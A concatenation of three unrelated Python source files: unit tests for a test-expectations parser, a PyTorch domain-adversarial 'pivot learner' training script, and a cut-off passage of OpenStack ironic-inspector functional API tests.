exp.to_string(), 'crbug.com/123 [ Intel ] test.html?Foo%20Bar [ Failure Pass ]')
def testExpectationWithPercentInTestNameToString(self):
exp = Expectation(reason='crbug.com/123', test='test.html?Foo%Bar', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, is_slow_test=False,
retry_on_failure=False)
self.assertEqual(
exp.to_string(), 'crbug.com/123 [ Intel ] test.html?Foo%25Bar [ Failure Pass ]')
def testGlobExpectationToString(self):
exp = Expectation(reason='crbug.com/123', test='a/*/test.html?*', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, is_slow_test=True,
retry_on_failure=True, is_glob=True)
self.assertEqual(
exp.to_string(), 'crbug.com/123 [ Intel ] a/\*/test.html?* [ Failure Pass RetryOnFailure Slow ]')
def testExpectationToStringUsingRawSpecifiers(self):
raw_expectations = (
'# tags: [ NVIDIA intel ]\n'
'# results: [ Failure Pass Slow ]\n'
'crbug.com/123 [ iNteL ] test.html?\* [ Failure Pass ]\n'
'[ NVIDIA ] test.\*.* [ Slow ] # hello world\n')
test_exps = TestExpectations()
ret, errors = test_exps.parse_tagged_list(raw_expectations)
assert not ret, errors
self.assertEqual(test_exps.individual_exps['test.html?*'][0].to_string(),
'crbug.com/123 [ iNteL ] test.html?\* [ Failure Pass ]')
self.assertEqual(test_exps.glob_exps['test.*.*'][0].to_string(),
'[ NVIDIA ] test.\*.* [ Slow ] # hello world')
def testExpectationToStringAfterRenamingTest(self):
exp = Expectation(reason='crbug.com/123', test='test.html?*', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, raw_tags=['iNteL'],
raw_results=['Failure', 'Pass'])
exp.test = 'a/*/test.html?*'
self.assertEqual(exp.to_string(), 'crbug.com/123 [ iNteL ] a/\*/test.html?\* [ Failure Pass ]')
def testAddExpectationsToExpectation(self):
raw_expectations = (
'# tags: [ NVIDIA intel ]\n'
'# results: [ Failure Pass Slow ]\n'
'crbug.com/123 [ iNteL ] test.html?\* [ Pass Failure ]\n'
'[ NVIDIA ] test.\*.* [ Slow ] # hello world\n')
test_exps = TestExpectations()
ret, errors = test_exps.parse_tagged_list(raw_expectations)
test_exps.individual_exps['test.html?*'][0].add_expectations(
{ResultType.Timeout}, reason='crbug.com/123 crbug.com/124')
assert not ret, errors
self.assertEqual(test_exps.individual_exps['test.html?*'][0].results,
frozenset([ResultType.Pass, ResultType.Failure,
ResultType.Timeout]))
self.assertEqual(test_exps.individual_exps['test.html?*'][0].reason,
'crbug.com/123 crbug.com/124')
def testAddingExistingExpectationsDoesntChangeRawResults(self):
raw_expectations = (
'# tags: [ NVIDIA intel ]\n'
'# results: [ Failure Pass Slow ]\n'
'crbug.com/123 [ iNteL ] test.html?\* [ Failure Pass ]\n'
'[ NVIDIA ] test.\*.* [ Slow ] # hello world\n')
test_exps = TestExpectations()
ret, errors = test_exps.parse_tagged_list(raw_expectations)
test_exps.individual_exps['test.html?*'][0].add_expectations(
{ResultType.Failure}, reason='crbug.com/124')
assert not ret, errors
self.assertIn('[ Failure Pass ]',
test_exps.individual_exps['test.html?*'][0].to_string())
def testTopDownOrderMaintainedForNonGlobExps(self):
raw_expectations = (
'# tags: [ NVIDIA intel ]\n'
'# results: [ Failure Pass Slow ]\n'
'crbug.com/123 [ iNteL ] test1 [ Pass Failure ]\n'
'crbug.com/123 [ iNteL ] test2 [ Pass Failure ]\n'
'crbug.com/123 [ iNteL ] test8 [ Pass Failure ]\n'
'crbug.com/123 [ iNteL ] test9 [ Pass Failure ]\n'
'crbug.com/123 [ iNteL ] test5 [ Pass Failure ]\n'
'[ NVIDIA ] test.\* [ Slow ] # hello world\n')
test_exps = TestExpectations()
ret, errors = test_exps.parse_tagged_list(raw_expectations)
assert not ret, errors
self.assertEqual(list(test_exps.individual_exps),
['test1','test2','test8', 'test9', 'test5', 'test.*'])
|
|
#!/usr/bin/python
import sys
from os.path import join,exists,dirname
import random
import numpy as np
from numpy.random import randint, choice
from sklearn.datasets import load_svmlight_file
from torch.autograd import Function, Variable
import torch.nn as nn
import torch.optim as optim
import torch
from torch import FloatTensor
from uda_common import read_feature_groups, read_feature_lookup
# the concepts here come from: https://github.com/fungtion/DANN/blob/master/models/model.py
class ReverseLayerF(Function):
@staticmethod
def forward(ctx, x, alpha):
ctx.alpha = alpha
return x.view_as(x)
@staticmethod
def backward(ctx, grad_output):
# Totally random:
# output = Variable(torch.randn(grad_output.shape).cuda()) + grad_output * 0 # grad_output.neg() * ctx.alpha
# zero (ignores domain)
# output = 0 * grad_output
# reversed (default)
output = grad_output.neg() * ctx.alpha
# print("Input grad is %s, output grad is %s" % (grad_output.data.cpu().numpy()[:10], output.data.cpu().numpy()[:10]))
return output, None
# Instead of this, may be able to just regularize by forcing off-diagonal to zero
# didn't work bc/ of memory issues
class StraightThroughLayer(nn.Module):
def __init__(self, input_features):
super(StraightThroughLayer, self).__init__()
self.vector = nn.Parameter( torch.randn(1, input_features) )
#self.add_module('pass-through vector', self.vector)
def forward(self, input_data):
# output = input_data * self.vector
output = torch.mul(input_data, self.vector)
return output
class PivotLearnerModel(nn.Module):
def __init__(self, input_features):
super(PivotLearnerModel, self).__init__()
# Feature takes you from input to the "representation"
# self.feature = nn.Sequential()
# straight through layer just does an element-wise product with a weight vector
num_features = input_features
# num_features = 200
# self.vector = nn.Parameter( torch.randn(1, input_features) )
self.feature = nn.Sequential()
self.feature.add_module('input_layer', StraightThroughLayer(input_features))
# self.feature.add_module('feature_layer', nn.Linear(input_features, num_features))
self.feature.add_module('relu', nn.ReLU(True))
# Standard feed forward layer:
# num_features = 200
# self.feature.add_module('input_layer', nn.Linear(input_features, num_features))
# self.feature.add_module('relu', nn.ReLU(True))
# task_classifier maps from a feature representation to a task prediction
self.task_classifier = nn.Sequential()
self.task_classifier.add_module('task_binary', nn.Linear(num_features, 1))
self.task_classifier.add_module('task_sigmoid', nn.Sigmoid())
# domain classifier maps from a feature representation to a domain prediction
self.domain_classifier = nn.Sequential()
# hidden_nodes = 100
# self.domain_classifier.add_module('domain_hidden', nn.Linear(num_features, hidden_nodes, bias=False))
# self.domain_classifier.add_module('relu', nn.ReLU(True))
self.domain_classifier.add_module('domain_classifier', nn.Linear(num_features, 1, bias=False))
# # self.domain_classifier.add_module('domain_predict', nn.Linear(100, 1))
self.domain_classifier.add_module('domain_sigmoid', nn.Sigmoid())
# self.domain_classifier2 = nn.Sequential()
# self.domain_classifier2.add_module('domain_linear', nn.Linear(num_features, 1, bias=False))
# # # self.domain_classifier.add_module('domain_predict', nn.Linear(100, 1))
# self.domain_classifier2.add_module('domain_sigmoid', nn.Sigmoid())
def forward(self, input_data, alpha):
feature = self.feature(input_data)
# feature = input_data * self.vector
task_prediction = self.task_classifier(feature)
# Get domain prediction
reverse_feature = ReverseLayerF.apply(feature, alpha)
domain_prediction = self.domain_classifier(reverse_feature)
# Only domain predictor 1 is reversed
# domain_prediction2 = self.domain_classifier2(feature)
return task_prediction, domain_prediction #(domain_prediction, domain_prediction2)
def main(args):
if len(args) < 1:
sys.stderr.write("Required arguments: <data file> [backward True|False]\n")
sys.exit(-1)
device = 'cpu'
if torch.cuda.is_available():
device = 'cuda'
if len(args) > 1:
backward = bool(args[1])
print("Direction is backward based on args=%s" % (args[1]))
else:
backward = False
print("Direction is forward by default")
# Read the data:
goal_ind = 2
domain_weight = 1.0
reg_weight = 0.1
lr = 0.01
epochs = 1000
batch_size = 50
sys.stderr.write("Reading source data from %s\n" % (args[0]))
all_X, all_y = load_svmlight_file(args[0])
# y is 1,2 by default, map to 0,1 for sigmoid training
all_y -= 1 # 0/1
# continue to -1/1 for softmargin training:
# all_y *= 2 # 0/2
# all_y -= 1 # -1/1
num_instances, num_feats = all_X.shape
domain_map = read_feature_groups(join(dirname(args[0]), 'reduced-feature-groups.txt'))
domain_inds = domain_map['Domain']
feature_map = read_feature_lookup(join(dirname(args[0]), 'reduced-features-lookup.txt'))
direction = 1 if backward else 0
sys.stderr.write("using domain %s as source, %s as target\n" %
(feature_map[domain_inds[direction]],feature_map[domain_inds[1-direction]]))
source_instance_inds = np.where(all_X[:,domain_inds[direction]].toarray() > 0)[0]
X_source = all_X[source_instance_inds,:]
X_source[:, domain_inds[direction]] = 0
X_source[:, domain_inds[1-direction]] = 0
y_source = all_y[source_instance_inds]
num_source_instances = X_source.shape[0]
num_train_instances = int(X_source.shape[0] * 0.8)
X_task_train = X_source[:num_train_instances,:]
y_task_train = y_source[:num_train_instances]
X_task_valid = X_source[num_train_instances:, :]
y_task_valid = y_source[num_train_instances:]
target_instance_inds = np.where(all_X[:,domain_inds[1-direction]].toarray() > 0)[0]
X_target = all_X[target_instance_inds,:]
X_target[:, domain_inds[direction]] = 0
X_target[:, domain_inds[1-direction]] = 0
num_target_train = int(X_target.shape[0] * 0.8)
X_target_train = X_target[:num_target_train,:]
# y_target_train = y_target[:num_target_train]
X_target_valid = X_target[num_target_train:, :]
# y_target_dev = y_target[num_target_train:]
# y_test = all_y[target_instance_inds]
num_target_instances = X_target_train.shape[0]
model = PivotLearnerModel(num_feats).to(device)
task_loss_fn = nn.BCELoss()
domain_loss_fn = nn.BCELoss()
l1_loss = nn.L1Loss()
#task_loss_fn.cuda()
# domain_loss_fn.cuda()
# l1_loss.cuda()
optimizer = optim.Adam(model.parameters())
# optimizer = optim.SGD(model.parameters(), lr=lr)
# weights = model.vector
try:
weights = model.feature.input_layer.vector
print("Before training:")
print("Min (abs) weight: %f" % (torch.abs(weights).min()))
print("Max (abs) weight: %f" % (torch.abs(weights).max()))
print("Ave weight: %f" % (torch.abs(weights).mean()))
num_zeros = (weights.data==0).sum()
near_zeros = (torch.abs(weights.data)<0.000001).sum()
print("Zeros=%d, near-zeros=%d" % (num_zeros, near_zeros))
except:
pass
# Main training loop
inds = np.arange(num_train_instances)
for epoch in range(epochs):
epoch_loss = 0
model.train()
# Do a training epoch:
for batch in range( 1+ ( num_train_instances // batch_size ) ):
model.zero_grad()
start_ind = batch * batch_size
if start_ind >= num_train_instances:
#This happens if our number of instances is perfectly divisible by batch size (when batch_size=1 this is often).
break
end_ind = num_train_instances if start_ind + batch_size >= num_train_instances else start_ind+batch_size
this_batch_size = end_ind - start_ind
## Gradually increase (?) the importance of the regularization term
ave_ind = start_ind + this_batch_size // 2
p = float(ave_ind + epoch * num_train_instances*2) / (epochs * num_train_instances*2)
alpha = 2. / (1. + np.exp(-10 * p)) - 1
source_batch = FloatTensor(X_task_train[start_ind:end_ind,:].toarray()).to(device) # read input
source_task_labels = torch.unsqueeze(FloatTensor([y_task_train[start_ind:end_ind],]).to(device), 1)# read task labels
source_domain_labels = torch.zeros(this_batch_size,1, device=device) # set to 0
# Get the task loss and domain loss for the source instance:
task_out, task_domain_out = model.forward(source_batch, alpha)
task_loss = task_loss_fn(task_out, source_task_labels)
domain_loss = domain_loss_fn(task_domain_out, source_domain_labels)
# domain2_loss = domain_loss_fn(task_domain_out[1], source_domain_labels)
try:
weights = model.feature.input_layer.vector
reg_term = l1_loss(weights, torch.zeros_like(weights, device=device))
except:
reg_term = 0
# Randomly select a matching number of target instances:
target_inds = choice(num_target_instances, this_batch_size, replace=False)
target_batch = FloatTensor(X_target_train[target_inds,:].toarray()).to(device) # read input
target_domain_labels = torch.ones(this_batch_size, 1, device=device)
# Get the domain loss for the target instances:
_, target_domain_out = model.forward(target_batch, alpha)
target_domain_loss = domain_loss_fn(target_domain_out, target_domain_labels)
# target_domain2_loss = domain_loss_fn(target_domain_out[1], target_domain_labels)
# Get sum loss update weights:
# domain adaptation:
# total_loss = task_loss + domain_weight * (domain_loss + target_domain_loss)
# Task only:
# total_loss = task_loss
# Domain only:
# total_loss = domain_loss + target_domain_loss
# Debugging with 2 domain classifiers:
# total_loss = domain_loss + domain2_loss + target_domain_loss + target_domain2_loss
# With regularization and DA term:
total_loss = (task_loss +
domain_weight * (domain_loss + target_domain_loss) +
reg_weight * reg_term)
# With regularization only:
# total_loss = task_loss + reg_term
epoch_loss += total_loss
total_loss.backward()
# for param in model.named_parameters():
# print(param[0])
# print(param[1])
optimizer.step()
# At the end of every epoch, examine domain accuracy and how many non-zero parameters we have
# unique_source_inds = np.unique(selected_source_inds)
# all_source_inds = np.arange(num_train_instances)
# eval_source_inds = np.setdiff1d(all_source_inds, unique_source_inds)
# source_eval_X = X_train[eval_source_inds]
# source_eval_y = y_train[eval_source_inds]
source_eval_X = X_task_valid
source_eval_y = y_task_valid
source_task_out, source_domain_out = model.forward( FloatTensor(source_eval_X.toarray()).to(device), alpha=0.)
# If using BCEWithLogitsLoss which would automatically do a sigmoid post-process
# source_task_out = nn.functional.sigmoid(source_task_out)
# source_domain_out = nn.functional.sigmoid(source_domain_out)
# source domain is 0, count up predictions where 1 - prediction = 1
# If using sigmoid outputs (0/1) with BCELoss
source_domain_preds = np.round(source_domain_out.cpu().data.numpy())
# if using Softmargin() loss (-1/1) with -1 as source domain
# source_domain_preds = np.round(((source_domain_out.cpu().data.numpy() * -1) + 1) / 2)
source_predicted_count = np.sum(1 - source_domain_preds)
source_domain_acc = source_predicted_count / len(source_eval_y)
target_eval_X = X_target_valid
_, target_domain_out = model.forward( FloatTensor(target_eval_X.toarray()).to(device), alpha=0.)
# If ussing with BCEWithLogitsLoss (see above)
# target_domain_out = nn.functional.sigmoid(target_domain_out)
# if using sigmoid output (0/1) with BCELoss
target_domain_preds = np.round(target_domain_out.cpu().data.numpy())
# if using Softmargin loss (-1/1) with 1 as target domain:
# target_domain_preds = np.round(((source_domain_out.cpu().data.numpy()) + 1) / 2)
target_predicted_count = np.sum(target_domain_preds)
domain_acc = (source_predicted_count + target_predicted_count) / (source_eval_X.shape[0] + target_eval_X.shape[0])
# if using 0/1 predictions:
source_y_pred = np.round(source_task_out.cpu().data.numpy()[:,0])
# if using -1/1 predictions? (-1 = not negated, 1 = negated)
# source_y_pred = np.round((source_task_out.cpu().data.numpy()[:,0] + 1) / 2)
# source_eval_y += 1
# source_eval_y /= 2
# predictions of 1 are the positive class: tps are where prediction and gold are 1
tps = np.sum(source_y_pred * source_eval_y)
true_preds = source_y_pred.sum()
true_labels = source_eval_y.sum()
recall = tps / true_labels
prec = 1 if tps == 0 else tps / true_preds
f1 = 2 * recall * prec / (recall+prec)
try:
weights = model.feature.input_layer.vector
num_zeros = (weights.data==0).sum()
near_zeros = (torch.abs(weights.data)<0.000001).sum()
print("Min (abs) weight: %f" % (torch.abs(weights).min()))
print("Max (abs) weight: %f" % (torch.abs(weights).max()))
print("Ave weight: %f" % (torch.abs(weights).mean()))
except:
num_zeros = near_zeros = -1
print("[Source] Epoch %d: loss=%f\tzeros=%d\tnear_zeros=%d\tnum_insts=%d\tdom_acc=%f\tP=%f\tR=%f\tF=%f" % (epoch, epoch_loss, num_zeros, near_zeros, len(source_eval_y), domain_acc, prec, recall, f1))
weights = model.feature.input_layer.vector
ranked_inds = torch.sort(torch.abs(weights))[1]
pivots = ranked_inds[0,-1000:]
pivot_list = pivots.cpu().data.numpy().tolist()
# pivot_list.sort()
for pivot in pivot_list:
print('%d : %s' % (pivot, feature_map[pivot]))
if __name__ == '__main__':
main(sys.argv[1:])
|
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import datetime
import functools
import json
import os
import sys
import tempfile
import time
import unittest
from unittest import mock
import urllib
import eventlet
import fixtures
from oslo_config import cfg
from oslo_config import fixture as config_fixture
from oslo_utils import timeutils
from oslo_utils import uuidutils
import pytz
import requests
from ironic_inspector.cmd import all as inspector_cmd
from ironic_inspector.cmd import dbsync
from ironic_inspector.common import ironic as ir_utils
from ironic_inspector import db
from ironic_inspector import introspection_state as istate
from ironic_inspector import main
from ironic_inspector import node_cache
from ironic_inspector import rules
from ironic_inspector.test import base
from ironic_inspector.test.unit import test_rules
eventlet.monkey_patch()
CONF = """
[ironic]
auth_type=none
endpoint_override=http://url
[pxe_filter]
driver = noop
[DEFAULT]
debug = True
introspection_delay = 0
auth_strategy=noauth
transport_url=fake://
[database]
connection = sqlite:///%(db_file)s
[processing]
processing_hooks=$default_processing_hooks,lldp_basic
store_data = database
"""
DEFAULT_SLEEP = 2
TEST_CONF_FILE = None
def get_test_conf_file():
global TEST_CONF_FILE
if not TEST_CONF_FILE:
d = tempfile.mkdtemp()
TEST_CONF_FILE = os.path.join(d, 'test.conf')
db_file = os.path.join(d, 'test.db')
with open(TEST_CONF_FILE, 'wb') as fp:
content = CONF % {'db_file': db_file}
fp.write(content.encode('utf-8'))
return TEST_CONF_FILE
def get_error(response):
return response.json()['error']['message']
def _query_string(*field_names):
def outer(func):
@functools.wraps(func)
def inner(*args, **kwargs):
queries = []
for field_name in field_names:
field = kwargs.pop(field_name, None)
if field is not None:
queries.append('%s=%s' % (field_name, field))
query_string = '&'.join(queries)
if query_string:
query_string = '?' + query_string
return func(*args, query_string=query_string, **kwargs)
return inner
return outer
class Base(base.NodeTest):
ROOT_URL = 'http://127.0.0.1:5050'
IS_FUNCTIONAL = True
def setUp(self):
super(Base, self).setUp()
rules.delete_all()
self.cli_fixture = self.useFixture(
fixtures.MockPatchObject(ir_utils, 'get_client'))
self.cli = self.cli_fixture.mock.return_value
self.cli.get_node.return_value = self.node
self.cli.patch_node.return_value = self.node
self.cli.nodes.return_value = [self.node]
self.patch = [
{'op': 'add', 'path': '/properties/cpus', 'value': '4'},
{'path': '/properties/cpu_arch', 'value': 'x86_64', 'op': 'add'},
{'op': 'add', 'path': '/properties/memory_mb', 'value': '12288'},
{'path': '/properties/local_gb', 'value': '999', 'op': 'add'}
]
self.patch_root_hints = [
{'op': 'add', 'path': '/properties/cpus', 'value': '4'},
{'path': '/properties/cpu_arch', 'value': 'x86_64', 'op': 'add'},
{'op': 'add', 'path': '/properties/memory_mb', 'value': '12288'},
{'path': '/properties/local_gb', 'value': '19', 'op': 'add'}
]
self.node.power_state = 'power off'
self.cfg = self.useFixture(config_fixture.Config())
conf_file = get_test_conf_file()
self.cfg.set_config_files([conf_file])
# FIXME(milan) FakeListener.poll calls time.sleep() which leads to
# busy polling with no sleep at all, effectively blocking the whole
# process by consuming all CPU cycles in a single thread. MonkeyPatch
# with eventlet.sleep seems to help this.
self.useFixture(fixtures.MonkeyPatch(
'oslo_messaging._drivers.impl_fake.time.sleep', eventlet.sleep))
def tearDown(self):
super(Base, self).tearDown()
node_cache._delete_node(self.uuid)
def call(self, method, endpoint, data=None, expect_error=None,
api_version=None):
if data is not None:
data = json.dumps(data)
endpoint = self.ROOT_URL + endpoint
headers = {'X-Auth-Token': 'token'}
if api_version:
headers[main._VERSION_HEADER] = '%d.%d' % api_version
res = getattr(requests, method.lower())(endpoint, data=data,
headers=headers)
if expect_error:
self.assertEqual(expect_error, res.status_code)
else:
if res.status_code >= 400:
msg = ('%(meth)s %(url)s failed with code %(code)s: %(msg)s' %
{'meth': method.upper(), 'url': endpoint,
'code': res.status_code, 'msg': get_error(res)})
raise AssertionError(msg)
return res
def call_introspect(self, uuid, manage_boot=True, **kwargs):
endpoint = '/v1/introspection/%s' % uuid
if manage_boot is not None:
endpoint = '%s?manage_boot=%s' % (endpoint, manage_boot)
return self.call('post', endpoint)
def call_get_status(self, uuid, **kwargs):
return self.call('get', '/v1/introspection/%s' % uuid, **kwargs).json()
def call_get_data(self, uuid, processed=True, **kwargs):
return self.call('get', '/v1/introspection/%s/data%s'
% (uuid, '' if processed else '/unprocessed'),
**kwargs).json()
@_query_string('marker', 'limit')
def call_get_statuses(self, query_string='', **kwargs):
path = '/v1/introspection'
return self.call('get', path + query_string, **kwargs).json()
def call_abort_introspect(self, uuid, **kwargs):
return self.call('post', '/v1/introspection/%s/abort' % uuid, **kwargs)
def call_reapply(self, uuid, **kwargs):
return self.call('post', '/v1/introspection/%s/data/unprocessed' %
uuid, **kwargs)
def call_continue(self, data, **kwargs):
return self.call('post', '/v1/continue', data=data, **kwargs).json()
def call_add_rule(self, data, **kwargs):
return self.call('post', '/v1/rules', data=data, **kwargs).json()
def call_list_rules(self, **kwargs):
return self.call('get', '/v1/rules', **kwargs).json()['rules']
def call_delete_rules(self, **kwargs):
self.call('delete', '/v1/rules', **kwargs)
def call_delete_rule(self, uuid, **kwargs):
self.call('delete', '/v1/rules/' + uuid, **kwargs)
def call_get_rule(self, uuid, **kwargs):
return self.call('get', '/v1/rules/' + uuid, **kwargs).json()
def _fake_status(self, finished=mock.ANY, state=mock.ANY, error=mock.ANY,
started_at=mock.ANY, finished_at=mock.ANY,
links=mock.ANY):
return {'uuid': self.uuid, 'finished': finished, 'error': error,
'state': state, 'finished_at': finished_at,
'started_at': started_at,
'links': [{u'href': u'%s/v1/introspection/%s' % (self.ROOT_URL,
self.uuid),
u'rel': u'self'}]}
def check_status(self, status, finished, state, error=None):
self.assertEqual(
self._fake_status(finished=finished,
state=state,
finished_at=finished and mock.ANY or None,
error=error),
status
)
curr_time = datetime.datetime.fromtimestamp(
time.time(), tz=pytz.timezone(time.tzname[0]))
started_at = timeutils.parse_isotime(status['started_at'])
self.assertLess(started_at, curr_time)
if finished:
finished_at = timeutils.parse_isotime(status['finished_at'])
self.assertLess(started_at, finished_at)
self.assertLess(finished_at, curr_time)
else:
self.assertIsNone(status['finished_at'])
def db_row(self):
"""return database row matching self.uuid."""
return db.model_query(db.Node).get(self.uuid)
class Test(Base):
def test_bmc(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
self.cli.create_port.assert_called_once_with(
node_uuid=self.uuid, address='11:22:33:44:55:66', extra={},
is_pxe_enabled=True)
self.assertTrue(self.cli.set_node_boot_device.called)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_port_creation_update_and_deletion(self):
cfg.CONF.set_override('add_ports', 'active', 'processing')
cfg.CONF.set_override('keep_ports', 'added', 'processing')
uuid_to_delete = uuidutils.generate_uuid()
uuid_to_update = uuidutils.generate_uuid()
# Two ports already exist: one with incorrect is_pxe_enabled, the other
# should be deleted.
self.cli.ports.return_value = [
mock.Mock(address=self.macs[1], id=uuid_to_update,
node_id=self.uuid, extra={}, is_pxe_enabled=True),
mock.Mock(address='foobar', id=uuid_to_delete,
node_id=self.uuid, extra={}, is_pxe_enabled=True),
]
# Two more ports are created, one with client_id. Make sure the
# returned object has the same properties as requested in create().
self.cli.create_port.side_effect = mock.Mock
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
calls = [
mock.call(node_uuid=self.uuid, address=self.macs[0],
extra={}, is_pxe_enabled=True),
mock.call(node_uuid=self.uuid, address=self.macs[2],
extra={'client-id': self.client_id},
is_pxe_enabled=False),
]
self.cli.create_port.assert_has_calls(calls, any_order=True)
self.cli.delete_port.assert_called_once_with(uuid_to_delete)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_port_not_update_pxe_enabled(self):
cfg.CONF.set_override('add_ports', 'active', 'processing')
cfg.CONF.set_override('keep_ports', 'added', 'processing')
cfg.CONF.set_override('update_pxe_enabled', False, 'processing')
uuid_to_update = uuidutils.generate_uuid()
# One port with incorrect pxe_enabled.
self.cli.ports.return_value = [
mock.Mock(address=self.macs[0], id=uuid_to_update,
node_id=self.uuid, extra={}, is_pxe_enabled=False)
]
# Two more ports are created, one with client_id. Make sure the
# returned object has the same properties as requested in create().
self.cli.create_port.side_effect = mock.Mock
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
calls = [
mock.call(node_uuid=self.uuid, address=self.macs[2],
extra={'client-id': self.client_id},
is_pxe_enabled=True),
]
self.assertFalse(self.cli.patch_port.called)
self.cli.create_port.assert_has_calls(calls, any_order=True)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_introspection_statuses(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
# NOTE(zhenguo): only test finished=False here, as we don't know
# other nodes status in this thread.
statuses = self.call_get_statuses().get('introspection')
self.assertIn(self._fake_status(finished=False), statuses)
# check we've got 1 status with a limit of 1
statuses = self.call_get_statuses(limit=1).get('introspection')
self.assertEqual(1, len(statuses))
all_statuses = self.call_get_statuses().get('introspection')
marker_statuses = self.call_get_statuses(
marker=self.uuid, limit=1).get('introspection')
marker_index = all_statuses.index(self.call_get_status(self.uuid))
# marker is the last row on previous page
self.assertEqual(all_statuses[marker_index+1:marker_index+2],
marker_statuses)
self.call_continue(self.data)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
# fetch all statuses and db nodes to assert pagination
statuses = self.call_get_statuses().get('introspection')
nodes = db.model_query(db.Node).order_by(
db.Node.started_at.desc()).all()
# assert ordering
self.assertEqual([node.uuid for node in nodes],
[status_.get('uuid') for status_ in statuses])
# assert pagination
half = len(nodes) // 2
marker = nodes[half].uuid
statuses = self.call_get_statuses(marker=marker).get('introspection')
self.assertEqual([node.uuid for node in nodes[half + 1:]],
[status_.get('uuid') for status_ in statuses])
# assert status links work
self.assertEqual([self.call_get_status(status_.get('uuid'))
for status_ in statuses],
[self.call('GET', urllib.parse.urlparse(
status_.get('links')[0].get('href')).path).json()
for status_ in statuses])
def test_manage_boot(self):
self.call_introspect(self.uuid, manage_boot=False)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.assertFalse(self.cli.set_node_power_state.called)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertFalse(self.cli.set_node_boot_device.called)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_rules_api(self):
res = self.call_list_rules()
self.assertEqual([], res)
rule = {
'conditions': [
{'op': 'eq', 'field': 'memory_mb', 'value': 1024},
],
'actions': [{'action': 'fail', 'message': 'boom'}],
'description': 'Cool actions',
'scope': "sniper's scope"
}
res = self.call_add_rule(rule)
self.assertTrue(res['uuid'])
rule['uuid'] = res['uuid']
rule['links'] = res['links']
rule['conditions'] = [
test_rules.BaseTest.condition_defaults(rule['conditions'][0]),
]
self.assertEqual(rule, res)
res = self.call('get', rule['links'][0]['href']).json()
self.assertEqual(rule, res)
res = self.call_list_rules()
self.assertEqual(rule['links'], res[0].pop('links'))
self.assertEqual([{'uuid': rule['uuid'],
'description': rule['description'],
'scope': rule['scope']}],
res)
res = self.call_get_rule(rule['uuid'])
self.assertEqual(rule, res)
self.call_delete_rule(rule['uuid'])
res = self.call_list_rules()
self.assertEqual([], res)
links = rule.pop('links')
del rule['uuid']
for _ in range(3):
self.call_add_rule(rule)
res = self.call_list_rules()
self.assertEqual(3, len(res))
self.call_delete_rules()
res = self.call_list_rules()
self.assertEqual([], res)
self.call('get', links[0]['href'], expect_error=404)
self.call('delete', links[0]['href'], expect_error=404)
def test_introspection_rules(self):
self.node.extra['bar'] = 'foo'
rules = [
{
'conditions': [
{'field': 'memory_mb', 'op': 'eq', 'value': 12288},
{'field': 'local_gb', 'op': 'gt', 'value': 998},
{'field': 'local_gb', 'op': 'lt', 'value': 1000},
{'field': 'local_gb', 'op': 'matches', 'value': '[0-9]+'},
{'field': 'cpu_arch', 'op': 'contains', 'value': '[0-9]+'},
{'field': 'root_disk.wwn', 'op': 'is-empty'},
{'field': 'inventory.interfaces[*].ipv4_address',
'op': 'contains', 'value': r'127\.0\.0\.1',
'invert': True, 'multiple': 'all'},
{'field': 'i.do.not.exist', 'op': 'is-empty'},
],
'actions': [
{'action': 'set-attribute', 'path': '/extra/foo',
'value': 'bar'}
]
},
{
'conditions': [
{'field': 'memory_mb', 'op': 'ge', 'value': 100500},
],
'actions': [
{'action': 'set-attribute', 'path': '/extra/bar',
'value': 'foo'},
{'action': 'fail', 'message': 'boom'}
]
},
]
for rule in rules:
self.call_add_rule(rule)
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.call_continue(self.data)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_any_call(
self.uuid,
